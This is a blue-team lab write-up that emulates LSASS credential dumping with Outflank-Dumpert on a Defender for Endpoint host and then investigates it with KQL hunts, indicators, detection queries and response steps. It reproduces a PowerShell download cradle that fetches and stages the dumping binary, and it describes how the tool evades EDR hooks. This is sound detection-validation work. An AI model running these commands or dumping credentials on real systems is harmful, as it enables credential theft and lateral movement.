Dumping LSASS,
and catching it.
An end-to-end adversary emulation and blue-team investigation: emulating a credential-theft intrusion against a Microsoft Defender for Endpoint host, then investigating it as a live incident to validate detection coverage.
Executive Summary
A credential-dumping tool was downloaded via a PowerShell cradle, executed through the command shell, and used to read the memory of the Windows lsass.exe process, writing a 53 MB credential dump to disk. Microsoft Defender for Endpoint detected the activity, raised multiple high-severity alerts, and automatically isolated the host. Through structured triage and KQL threat hunting, the full attack lifecycle was reconstructed, enriched with threat intelligence, and confirmed as a true positive.
LSASS credential dumping is one of the most common precursors in ransomware and hands-on-keyboard intrusions. A single successful dump can expose every credential cached on a host, enabling pass-the-hash and lateral movement across an entire domain. Validating that an EDR detects this technique, and that an analyst can investigate it end to end, is precisely the capability that shrinks attacker dwell time and stops one compromised host from becoming a domain-wide breach.
Lab Environment
A focused single-host lab with full EDR telemetry, mirroring the foundational visibility a SOC analyst works with daily. A clean, well-understood environment makes detection validation defensible: every event can be attributed and explained.
| Component | Detail |
|---|---|
| Host | winserv2025 · Windows Server 2025 Datacenter (Azure) |
| Device ID | 0891dcf7d7bef51643b86555d806a9974d94a24b |
| EDR | Microsoft Defender for Endpoint — onboarded, telemetry confirmed |
| Emulation | Atomic Red Team · C:\AtomicRedTeam\ |
| Investigation | Microsoft Defender XDR portal + Advanced Hunting (KQL) |
| Account in scope | mrdaniel98 (local interactive user) |
Tooling note — Outflank-Dumpert was chosen deliberately. It uses direct system calls and API unhooking to access LSASS while evading the userland hooks many EDRs rely on. Validating detection against an evasion-aware tool is a stronger test than a naïve procdump run.
Investigation Walkthrough
This section follows the actual order of investigation. It is written to show analyst reasoning, not just findings.
3.1 Initial Alert & Triage Discipline
The investigation began from an MDE alert flagged as potential human-operated suspicious activity. Before concluding anything, I reviewed the surrounding device timeline. The activity immediately preceding the alert was a routine browser session, expected baseline for this host. I then examined the process tree at the head of the chain.
This is the legitimate Windows boot chain. wininit.exe → services.exe → mssense.exe (the MDE sensor) is expected, all images are Microsoft-signed at 0/71 on VirusTotal, and timestamps align with system startup. Benign — but I did not close here. A benign boot chain inside a flagged incident is a prompt to ask what else MDE correlated, not a reason to dismiss.
3.2 Scoping the Incident
Blast radius: one device (winserv2025, High risk) and one flagged account (mrdaniel98).
3.3 Separating Signal from Correlated Noise
The incident timeline held two high-severity alerts and one lower-value correlated artifact.
The msedge.exe renamed Local State event drew attention because the file signer showed as Unknown. I investigated rather than assuming.
The PreviousFileName was an Edge-Local-State-Tmp-*.tmp file in Edge's User Data folder. This is the atomic safe-write pattern Chromium browsers use universally: write to a temp file, then rename to Local State to avoid corruption. It was pulled into the incident by correlation with genuinely malicious activity on the same account — benign correlated noise. Refocused on the two high-severity alerts.
Analyst maturity is recognising correlation noise instead of chasing it indefinitely — and verifying before dismissing. Both happened here. One query to clear it, then move on.
3.4 The Real Lead — Credential Access (T1003.001)
Two high-severity alerts defined the incident: Compromised account credentials (Credential Access) and Compromised account conducting hands-on-keyboard attack (Lateral Movement). The first was explicitly tagged T1003.001 — LSASS Memory and named the responsible process.
Reconstructing the process tree gave the execution chain:
powershell.exe (8768) # initial download cradle
└─ cmd.exe (10080) # /c "...\ExternalPayloads\Outflank-Dumpert.exe"
└─ Outflank-Dumpert.exe (2764) # unsigned · VirusTotal 52/70
└─ accessed lsass.exe (856) # Credential Access| Indicator | Value | Significance |
|---|---|---|
| Payload signer | Unknown | Legitimate tooling is signed |
| VirusTotal | 52 / 70 | High-confidence malicious binary |
| Exec path | C:\AtomicRedTeam\ExternalPayloads\ | Non-standard, staged location |
| Target | lsass.exe | Holds NTLM hashes, Kerberos tickets, cached creds |
52/70 on an unsigned binary that accesses LSASS is unambiguous — this alone closes the question of whether the binary is malicious. Remaining work: confirm how it arrived and whether it succeeded.
3.5 Confirming the Delivery Mechanism
Pivoting to Advanced Hunting, the initiating PowerShell command line told the full story — a textbook stage-and-execute download cradle.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path "...\ExternalPayloads\Outflank-Dumpert.exe") -Force
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/.../Outflank-Dumpert.exe" `
-OutFile "...\ExternalPayloads\Outflank-Dumpert.exe"Forces TLS 1.2 to guarantee the download, creates a staging directory, pulls the payload from a public code-hosting URL, and saves it for execution.
3.6 Confirming Impact — Did the Dump Succeed?
The most important question in any credential-access incident: did the attacker actually obtain credentials? I hunted for the dump artifact.
DeviceFileEvents
| where DeviceName == "winserv2025"
| where FileName == "dumpert.dmp"
| project Timestamp, FileName, FolderPath, ActionType, FileSize,
InitiatingProcessFileName, SHA256
The dump succeeded. A 53 MB artifact is consistent with a full LSASS memory image, not a failed or empty write. The attacker now possesses a credential dump that can be parsed offline (e.g. with Mimikatz) to extract every hash and ticket cached on the host. This is the moment an incident escalates from "suspicious" to "contain now."
3.7 Post-Exploitation Hunting
Querying process activity in the session window revealed what the operator did around the dump.
| Activity | Process | ATT&CK | Assessment |
|---|---|---|---|
| Identity enum | whoami.exe | T1033 | Operator orienting on account privileges |
| Host enum | hostname.exe | T1082 | Confirming the landed machine |
| Scheduled task | schtasks /create | T1053.005 | Persistence pattern in session window |
| On-host compile | csc.exe /noconfig | T1027 | C# compiler invocation — hunt lead |
The whoami / hostname enumeration is the clearest attacker-relevant post-exploitation behavior — running identity and host discovery around a credential dump is characteristic of a human operator making real-time decisions, consistent with MDE's "hands-on-keyboard" classification. In this emulation, the scheduled-task and csc.exe events partly trace to the Atomic Red Team harness; in a production incident each would warrant its own dedicated hunt, so they are documented here as leads rather than confirmed adversary persistence.
3.8 Exfiltration Hunt (Network Analysis)
Final question: did the 53 MB dump leave the machine? I scoped outbound connections to the attack-relevant processes only.
DeviceNetworkEvents
| where DeviceName == "winserv2025"
| where Timestamp >= datetime(2026-06-07T15:45:14Z)
| where InitiatingProcessFileName in~ ("powershell.exe","cmd.exe","Outflank-Dumpert.exe")
| project Timestamp, RemoteIP, RemotePort, RemoteUrl, InitiatingProcessFileName
| Destination | Port | Assessment |
|---|---|---|
| github.com | 443 | Payload download source (already documented) |
| cdn.oneget.org | 443 | Microsoft PowerShell package CDN — benign |
| *.powershellgallery.com | 443 | Microsoft PowerShell Gallery — benign |
I enriched the most interesting outbound domain with threat intelligence.
VirusTotal returned 0/91 for cdn.oneget.org, and context (Microsoft-owned package infrastructure, traffic during module install, a top-10K domain) confirms it benign. Critically, no outbound connection came from Outflank-Dumpert.exe itself, and no exfiltration of the dump was observed. The credential dump remained local at the time of detection.
A clean VirusTotal result does not prove a domain is safe — it only means no engine has flagged it. The benign conclusion here rests on corroborating context (ownership, timing, purpose), not on the score alone.
MITRE ATT&CK Mapping
| Tactic | Technique | ID | Observed Behavior |
|---|---|---|---|
| Execution | Command & Scripting Interpreter: PowerShell | T1059.001 | Download cradle staging the payload |
| Execution | Command & Scripting Interpreter: Windows Command Shell | T1059.003 | cmd.exe /c launching the binary |
| Credential Access | OS Credential Dumping: LSASS Memory | T1003.001 | Reading lsass.exe → dumpert.dmp |
| Discovery | System Owner/User Discovery | T1033 | whoami enumeration |
| Discovery | System Information Discovery | T1082 | hostname enumeration |
| Persistence | Scheduled Task/Job | T1053.005 | schtasks /create in session (hunt lead) |
Indicators of Compromise
Malicious binary — Outflank-Dumpert.exe
| SHA1 | c494bbb35b2b53b3a05aef627710e27c7c800a1f |
| SHA256 | f323569e5d64a3aa60045bd06c2421e729d1c0d79028aba9e227d9eeaeec62e5 |
| MD5 | 69c05093eb542e1c29a556a29e74e99a |
| Path | C:\AtomicRedTeam\ExternalPayloads\Outflank-Dumpert.exe |
| VT | 52 / 70 |
Credential dump artifact — dumpert.dmp
| SHA256 | 7dbdac5eb14bc2718ef9bfdf8486f4d97ee09cceb10d936c33df227ff2cf2798 |
| Path | C:\Windows\Temp\dumpert.dmp |
| Size | 55,577,992 bytes |
Network & host (defanged)
| Download URL | hxxps://github[.]com/clr2of8/Dumpert/raw/.../Outflank-Dumpert.exe |
| Host | winserv2025 |
| Account | mrdaniel98 |
Note: the specific raw URL is the indicator; github.com itself is a legitimate, widely abused host and should not be blocked wholesale.
Detection Engineering
Reusable detection logic for this attack class. Each query is paired with false-positive tuning, because a detection that fires constantly is as useless as one that never fires.
6.1 LSASS access by a non-system process // core T1003.001
DeviceEvents
| where ActionType == "LsassProcessAccess"
| where InitiatingProcessFileName !in~ (
"MsMpEng.exe","mssense.exe","svchost.exe","csrss.exe",
"wininit.exe","lsass.exe","services.exe")
| project Timestamp, DeviceName, InitiatingProcessFileName,
InitiatingProcessFolderPath, InitiatingProcessCommandLineCatches: any process outside a known-good allowlist reading LSASS — the defining behavior of T1003.001. Tuning: build the allowlist from your own environment baseline; legitimate security and backup agents touch LSASS.
6.2 PowerShell download cradle writing an EXE
DeviceProcessEvents
| where InitiatingProcessFileName =~ "powershell.exe"
| where ProcessCommandLine has_any ("Invoke-WebRequest","IWR","Net.WebClient","DownloadFile")
| where ProcessCommandLine has_any (".exe","-OutFile")
| project Timestamp, DeviceName, AccountName, ProcessCommandLineCatches: the staging step where PowerShell pulls a remote binary to disk. Tuning: pair with reputation (unsigned/new file) to separate from legitimate installers.
6.3 Suspicious .dmp artifact in a temp path
DeviceFileEvents
| where ActionType == "FileCreated" and FileName endswith ".dmp"
| where FolderPath has_any ("\\Temp\\","\\AppData\\","\\ProgramData\\")
| where InitiatingProcessFileName !in~ ("WerFault.exe","dwwin.exe")
| project Timestamp, DeviceName, FileName, FolderPath, FileSize, InitiatingProcessFileNameCatches: on-disk evidence of a successful dump — a backstop when the access event is missed. Tuning: Windows Error Reporting is excluded; large dumps from unexpected parents are the signal.
| Detection layer | Fired? |
|---|---|
| MDE built-in — T1003.001 LSASS Memory alert | Yes |
| MDE built-in — Compromised account / hands-on-keyboard | Yes |
| MDE Attack Disruption — automatic host isolation | Yes |
| Custom analytic 6.1 (LSASS access) | Validated |
| Custom analytic 6.3 (dump artifact) | Validated |
Recommended Response
Containment, eradication, and recovery guidance a SOC would attach to this incident.
- Isolate
winserv2025(MDE did this automatically — confirm it held). - Treat
mrdaniel98and every credential cached on the host as compromised. - Preserve
dumpert.dmpfor forensic analysis before removal.
- Remove the payload and staging directory.
- Force password resets for the account and any identity that logged on to the host; rotate cached local-admin and service-account secrets.
- Invalidate active Kerberos tickets; consider
krbtgtreset if domain-joined and broader compromise is suspected.
- Enable LSA Protection (RunAsPPL) and Credential Guard to make LSASS dumping materially harder.
- Deploy the Section 6 analytics as scheduled detections; add custom indicators for the payload hashes.
- Restrict PowerShell with Constrained Language Mode and script-block logging where feasible.
Analyst Notes
- Confirming impact is the analyst's job, not an assumption. The dump file size was the difference between "a tool ran" and "credentials were stolen."
- Verify before dismissing, and dismiss when verified. The Edge
Local Staterename was worth one query to clear; chasing it further would have wasted time on the real lead. - Reputation scores are an input, not a verdict. Both the malicious binary (52/70) and the benign domain (0/91) were read in context.
- Tooling can interfere with itself. MDE Attack Disruption auto-isolated the host mid-emulation; recognising that the EDR was severing the process chain, and managing around it safely, is itself a real operational skill.